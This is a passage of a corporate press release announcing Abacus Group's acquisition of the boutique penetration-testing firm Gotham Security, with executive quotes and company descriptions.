Complementing and aligning with Abacus Group's leading cybersecurity technology platform, Gotham Security's services will continue to be delivered by its team of industry trailblazers, comprised of cybersecurity leaders, researchers, educators, and creators. Gotham Security's dedicated leadership team will remain at the helm of the company, bringing their passion for elevated quality, insight, and cybersecurity awareness to both their own clients and customers of Abacus Group.  

Chris Grandi, CEO of Abacus Group, commented: "This acquisition is a natural next step in a long working relationship with Gotham Security, as the businesses have been valued resources to each other and our clients over the last decade. It's fantastic to now join forces and take further strides in our own expansion from MSP to MSSP. Abacus Group has always been committed to keeping our clients safe and secure, especially as the security and regulatory landscape continues to evolve in line with escalating cyber threats. Therefore, we are thrilled to be able to expand our cybersecurity capabilities and provide the full suite of services offered by Gotham Security to our customers and investors."

The synergy between Abacus Group's cybersecurity offerings and Gotham Security will result in a complete set of MSSP capabilities. Expanding further into the MSSP space will support Abacus Group in meeting the growing demand for comprehensive, expert-led cybersecurity insights at every level of an organization's technology stack, especially as security threats against businesses continue to increase and become ever more sophisticated.

Christian Scott, COO, CISO and Partner at Gotham Security, added: "This is a very exciting time for everyone at Gotham Security. Alongside the close, collaborative working relationship we've developed with Abacus Group over the years, our shared mission to provide a broader scope of high-quality cybersecurity and technology services to customers has been the key driving force behind our union under the same umbrella. We continue to take pride in the best-in-class security insight we provide to our customers, but we've also listened closely to their growing demand for integrated technology solutions that fulfil an entire spectrum of security needs and requirements. The complementary opportunities created by Abacus Group's robust technology solutions and Gotham Security's innovative cybersecurity services will provide greater value and more options than ever to our shared customer base."

Lowenstein Sandler LLP served as legal counsel to Abacus Group, while Szaferman, Lakind, Blumstein & Blader, PC. Served as legal counsel to GoVanguard and Gotham Security on the transaction.

**About Abacus Group**

Abacus Group is a leading provider of hosted IT solutions and services focused on helping alternative investment firms by providing an enterprise technology platform specifically designed for the unique needs of the financial services industry. The innovative and award-winning Abacus Cloud platform allows investment managers to source all technology needs as a service, offering the capacity to scale on demand to meet current and future cybersecurity, storage and compliance requirements. The company has offices in New York, NY; San Francisco, CA; Boston, MA; Dallas, TX; Greenwich, CT; Los Angeles, CA; Charlotte, NC; Miami, FL; and London, England. For more information, visit www.abacusgroupllc.com.

**About Gotham Security**

Gotham Security is a boutique cybersecurity firm founded in 2013 and based out of Manhattan, focused on providing high-quality penetration testing, malicious adversary simulation, threat intelligence services, and cybersecurity strategy services. Our team is comprised of elite white hat hackers, known as the go-to "cyber strike team." We are not just excellent at red teaming, more importantly, we know how to communicate cybersecurity threats in a practical way to organizations. We work with a growing number of Fortune 1000 companies across all major sectors of business, including multi-billion-dollar hedge funds, major insurance providers, international options trading exchanges, and more.

SOURCE Abacus Group LLC

Tag

#intel